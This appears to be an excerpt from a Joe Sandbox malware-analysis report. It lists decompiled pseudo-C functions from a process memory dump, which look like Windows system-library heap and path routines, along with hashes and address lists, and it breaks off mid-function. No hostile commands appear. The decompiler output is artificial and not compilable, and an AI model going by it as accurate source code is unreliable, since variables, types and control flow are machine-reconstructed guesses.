0x037d8b1a
0x037d8b1a
0x00000000
0x037d8ad5
0x037d8a89

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bddd619487e31f980abe212e0cae53b929485e6ab653b5dca7c586f7bc9ef5
Instruction ID: e5f0a89f9b760e52d30e471e40bc3760665aa5a5cb5aa2a0ec3fc17b5731d7ed
Opcode Fuzzy Hash: c9bddd619487e31f980abe212e0cae53b929485e6ab653b5dca7c586f7bc9ef5
Instruction Fuzzy Hash: 8D4141B5A4032CABDB24DF59CC88AA9B7B8EB84300F1446E9D919D7251E7709E84CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0388FDE2 Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0388FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E0388FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E03890A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E037E7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E03881608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E03892B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E0388C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E0388DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E037E7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E0388A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x0388fde7
0x0388fde8
0x0388fdec
0x0388fdee
0x0388fdf5
0x0388fdf7
0x0388fdfc
0x0388fe19
0x0388fe22
0x0388fe26
0x0388fec6
0x0388fecd
0x0388fed5
0x0388fee7
0x0388fed7
0x0388fee0
0x0388fee0
0x0388feef
0x0388ff00
0x0388ff02
0x0388ff07
0x0388ff07
0x00000000
0x0388feef
0x0388fe33
0x0388fe55
0x0388fe59
0x0388fe5b
0x0388fe5e
0x0388fe69
0x0388fe6d
0x0388fe6d
0x0388fe69
0x0388fe35
0x0388fe41
0x0388fe41
0x0388fe79
0x0388fe8b
0x0388fe7b
0x0388fe84
0x0388fe84
0x0388fe93
0x00000000
0x0388fea8
0x0388feba
0x00000000
0x0388feba
0x0388fdfe
0x0388fe01
0x0388fe02
0x0388fe08
0x0388ff0c
0x0388ff14
0x0388ff14

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: a961515b5cdc0a3b8ecba61938a846a71abb637bb9e2472e690d8a98e4ecfb32
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: B731C036200644AFDB26EBE8D844F6ABBE9EFC5650F184499E646CF342DB74D841C720

Uniqueness

Uniqueness Score: -1.00%

Function 0388EA55 Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0388EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E037E2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E0388E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E037CF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E037DFFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E0388AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E0388BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E037E7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E0387FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E037DFFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E0388A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}

0x0388ea55
0x0388ea66
0x0388ea68
0x0388ea6c
0x0388ea6f
0x0388ea72
0x0388ea75
0x0388ea7a
0x0388ea7a
0x0388ea7e
0x0388ea80
0x0388ea85
0x0388ea8b
0x0388eab5
0x0388eabc
0x0388eabf
0x0388eabf
0x0388eaca
0x0388eace
0x0388ead0
0x0388eae4
0x0388eaeb
0x0388eaf0
0x0388eaf5
0x0388eb09
0x0388eb0d
0x0388eb1d
0x0388eb2d
0x0388eb38
0x0388eb3d
0x0388eb41
0x0388eb4a
0x0388eb60
0x0388eb4c
0x0388eb52
0x0388eb59
0x0388eb59
0x0388eb68
0x0388eb71
0x0388eb71
0x0388ea8d
0x0388ea8f
0x0388ea92
0x0388ea97
0x0388ea97
0x0388ea9b
0x0388ea9c
0x0388ea9e
0x0388eaa6
0x0388eaa6
0x0388eb7e

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: b9b12177f5c8453a4576612994e842190bc2e9cf55d19fcdbed8c8e9932a8337
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: C231D2366047059BC719EF68CC84A6BB7AAFFC4710F08496DF556CB641DE34E805CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 038469A6 Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E038469A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x38bd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L037D6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E03846BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03809980() >= 0) {
							E037E2280(_t56, 0x38b8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x38b8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x38b8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E037CB6F0(0x37ac338, 0x37ac288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03809520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E038095D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E037DFFB0(_t68, _t77, 0x38b8778);
				}
				_pop(_t78);
				return E0380B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x038469b5
0x038469be
0x038469c3
0x038469c9
0x038469cc
0x038469d1
0x038469d3
0x038469de
0x038469e1
0x038469ea
0x038469f6
0x038469fe
0x03846a13
0x03846a14
0x03846a15
0x03846a16
0x03846a1e
0x03846a26
0x03846a31
0x03846a36
0x03846a37
0x03846a40
0x03846a49
0x03846a4a
0x03846a53
0x03846a59
0x03846a5d
0x03846a5e
0x03846a64
0x03846a67
0x03846a6a
0x03846a6d
0x03846a70
0x03846a77
0x03846a7d
0x03846a86
0x03846a89
0x03846a9c
0x03846a9f
0x03846aa2
0x03846aa5
0x03846aaf
0x03846ab1
0x03846ab8
0x03846ab9
0x03846abb
0x03846abe
0x03846ac5
0x03846ac5
0x03846aaf
0x03846a40
0x03846a26
0x038469fe
0x03846ace
0x03846ad0
0x03846ad3
0x03846ad8
0x03846adf
0x03846adf
0x03846ae8
0x03846aef
0x03846aef
0x03846af9
0x03846b06

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6e4c6cf975c04d6c2d2d1c77d355be8369488253723b3cd4dfd1e2c66df5d51
Instruction ID: 9d5d18ab3518ed43e37fd215ca3156a7da771bca4c1a327f3b45b44e67fe2b09
Opcode Fuzzy Hash: b6e4c6cf975c04d6c2d2d1c77d355be8369488253723b3cd4dfd1e2c66df5d51
Instruction Fuzzy Hash: D4417CB5E01708AFDB14DFA9C840BAEBBF8EF48314F1881A9E414E6251EB709905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 037C5210 Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E037C5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E037C52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E038095D0();
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E037DEB70(_t54, 0x38b79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E038095D0();
								L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E037DEB70(_t54, 0x38b79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0380F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E037DEB70(_t54, 0x38b79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E038095D0();
							L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x037c5220
0x037c5224
0x03820d13
0x03820d16
0x03820d19
0x037c522a
0x037c522a
0x037c522d
0x037c522d
0x037c5231
0x037c5235
0x037c5239
0x03820d5c
0x03820d62
0x00000000
0x00000000
0x03820d6a
0x03820d7b
0x03820d7f
0x03820d81
0x03820d84
0x03820d95
0x03820d95
0x03820d6c
0x03820d71
0x03820d71
0x03820d9a
0x00000000
0x037c524a
0x037c524a
0x037c5250
0x03820d24
0x03820d35
0x03820d39
0x03820d3b
0x03820d3e
0x03820d50
0x03820d50
0x03820d26
0x03820d2b
0x03820d2b
0x00000000
0x03820d55
0x037c5256
0x037c525b
0x037c5265
0x03820da7
0x037c526b
0x037c526e
0x037c5272
0x03820db1
0x03820db4
0x03820dc5
0x03820dc5
0x037c5272
0x037c5278
0x037c527e
0x037c528a
0x037c528c
0x037c528d
0x00000000
0x037c5280
0x037c5282
0x037c5288
0x037c529f
0x037c5292
0x00000000
0x037c5292
0x00000000
0x037c5288
0x037c527e

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1d338b8bac1c70a7ac3a2f21ec349d63ba85a6f0e374d49166c015e7315f798
Instruction ID: 384fb59b07af68ec9698c441861e3a802910b557c1ac06f0699fdaa015db522a
Opcode Fuzzy Hash: d1d338b8bac1c70a7ac3a2f21ec349d63ba85a6f0e374d49166c015e7315f798
Instruction Fuzzy Hash: 5C312571252750ABC726EB99CC40F66BBA9FF00770F14476DE4558F6A1D721F840CA90

Uniqueness

Uniqueness Score: -1.00%

Function 037FA61C Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E037FA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x38a0220);
				E0381D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x38b7b9c; // 0x0
				_t55 = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0381D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x38b7b10 =  *0x38b7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x38b536c; // 0x31d2c38
					if( *_t51 != 0x38b5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x38b5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x38b536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E037FA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x037fa61c
0x037fa61e
0x037fa623
0x037fa628
0x037fa62b
0x037fa62d
0x037fa648
0x037fa64a
0x037fa64f
0x03839b44
0x037fa6ec
0x037fa6f1
0x037fa6f1
0x037fa655
0x037fa657
0x037fa65a
0x037fa65d
0x037fa662
0x037fa663
0x037fa667
0x037fa668
0x037fa66d
0x037fa706
0x037fa706
0x03839bda
0x03839be6
0x03839beb
0x00000000
0x03839beb
0x037fa679
0x03839b7a
0x00000000
0x03839b7a
0x037fa683
0x037fa6f4
0x037fa6f7
0x037fa6f9
0x037fa6fd
0x037fa6a0
0x037fa6a0
0x037fa6ad
0x037fa6af
0x037fa6b4
0x03839ba7
0x03839bac
0x00000000
0x00000000
0x03839bc6
0x03839bce
0x03839bd1
0x03839bd3
0x03839bd3
0x00000000
0x03839bd1
0x037fa6bd
0x037fa6c3
0x037fa6c6
0x037fa6d2
0x037fa701
0x037fa704
0x00000000
0x037fa704
0x037fa6d4
0x037fa6d6
0x037fa6d9
0x037fa6db
0x037fa6e1
0x037fa6e6
0x037fa6e8
0x037fa6e8
0x037fa6ea
0x00000000
0x037fa6ea
0x037fa688
0x037fa692
0x037fa694
0x037fa699
0x00000000
0x00000000
0x037fa69d
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56191030040185ed0f6438c42824fac0b82cddf786a4d0b75b678780f7e21d1d
Instruction ID: 3f535d2e07b8349cbf8ac33939d051fd17e88f00df434f8987c6da20e1cd313e
Opcode Fuzzy Hash: 56191030040185ed0f6438c42824fac0b82cddf786a4d0b75b678780f7e21d1d
Instruction Fuzzy Hash: 41414975A00315DFCB45CF98C890B99BBF1BF8A304F1980A9E908EB344D775A901CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 03803D43 Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03803D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E037D7B60(0, _t61, 0x37a11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E037D7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L037E4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x03803d4c
0x03803d50
0x03803d55
0x03803d5e
0x0383e79a
0x00000000
0x0383e79a
0x03803d68
0x0383e789
0x03803d9d
0x03803da3
0x03803daf
0x03803db5
0x03803dbc
0x03803dc4
0x03803dc9
0x03803dce
0x0383e7ae
0x0383e7ae
0x03803dde
0x03803de2
0x03803de7
0x03803e0d
0x03803e13
0x03803e16
0x03803e1e
0x03803e25
0x03803e28
0x00000000
0x00000000
0x03803e2a
0x03803e2f
0x03803e37
0x03803e37
0x00000000
0x03803e37
0x03803e31
0x00000000
0x03803e31
0x03803e20
0x03803e20
0x03803e35
0x00000000
0x03803de9
0x03803de9
0x03803de9
0x03803dee
0x03803dfd
0x03803dff
0x03803e02
0x03803e05
0x03803e05
0x00000000
0x03803df0
0x03803de7
0x0383e78f
0x0383e794
0x03803d79
0x03803d84
0x03803d89
0x03803d8e
0x00000000
0x0383e7a4
0x03803d96
0x03803d9a
0x00000000
0x03803d9a
0x00000000
0x0383e794
0x03803d6e
0x03803d73
0x00000000
0x0383e7b5
0x00000000

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08e8ecb1582c45be7ae610bb9ac34a78c4f9d730d80b0e60e7d8d77b004c55eb
Instruction ID: 065932942d29953a0f4f56b68190729362416f90ecdd0a2bdbf055c952c8b85a
Opcode Fuzzy Hash: 08e8ecb1582c45be7ae610bb9ac34a78c4f9d730d80b0e60e7d8d77b004c55eb
Instruction Fuzzy Hash: B731B03AA01615DFCB74CFA9C841A7ABBF5EF46700B0980EAE855CB790E7B0D840C790

Uniqueness

Uniqueness Score: -1.00%

Function 037EC182 Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E037EC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E037E7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03898D34(_v8, _t80);
					}
					E037E2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E037DFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03898833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E037DFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0380B180();
						if(_a4 != 0) {
							E037E2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E037EBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
